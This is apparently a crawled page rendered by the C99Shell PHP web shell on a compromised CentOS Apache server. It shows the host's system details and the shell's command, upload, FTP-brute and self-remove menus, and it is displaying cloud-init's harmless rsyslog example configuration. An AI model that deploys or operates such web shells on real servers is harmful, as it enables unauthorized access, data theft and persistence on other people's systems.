!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16. PHP/5.4.16 

uname -a: Linux roko-bkp 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 

uid=48(apache) gid=48(apache) groups=48(apache),1003(webmaster) 

Safe-mode: OFF (not secure)

/usr/share/doc/cloud-init/examples/   drwxr-xr-x
Free 9.18 GB of 93.48 GB (9.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cloud-config-rsyslog.txt (1.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
## the rsyslog module allows you to configure the systems syslog.
## configuration of syslog is under the top level cloud-config
## entry 'rsyslog'.
##
## Example:
#cloud-config
rsyslog:
 remotes:
  # udp to host 'maas.mydomain' port 514
  maashost: maas.mydomain
  # udp to ipv4 host on port 514
  maas: "@[10.5.1.56]:514"
  # tcp to host ipv6 host on port 555
  maasipv6: "*.* @@[FE80::0202:B3FF:FE1E:8329]:555"
 configs:
   - "*.* @@192.158.1.1"
   - content: "*.*   @@192.0.2.1:10514"
     filename: 01-example.conf
   - content: |
      *.*   @@syslogd.example.com
 config_dir: /etc/rsyslog.d
 config_filename: 20-cloud-config.conf
 service_reload_command: [your, syslog, reload, command]

## Additionally the following legacy format is supported
## it is converted into the format above before use.
##  rsyslog_filename -> rsyslog/config_filename
##  rsyslog_dir -> rsyslog/config_dir
##  rsyslog -> rsyslog/configs
# rsyslog:
#  - "*.* @@192.158.1.1"
#  - content: "*.*   @@192.0.2.1:10514"
#    filename: 01-example.conf
#  - content: |
#     *.*   @@syslogd.example.com
# rsyslog_filename: 20-cloud-config.conf
# rsyslog_dir: /etc/rsyslog.d

## to configure rsyslog to accept remote logging on Ubuntu
## write the following into /etc/rsyslog.d/20-remote-udp.conf
##   $ModLoad imudp
##   $UDPServerRun 514
##   $template LogRemote,"/var/log/maas/rsyslog/%HOSTNAME%/messages"
##   :fromhost-ip, !isequal, "127.0.0.1" ?LogRemote
## then:
## sudo service rsyslog restart

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.5892 ]--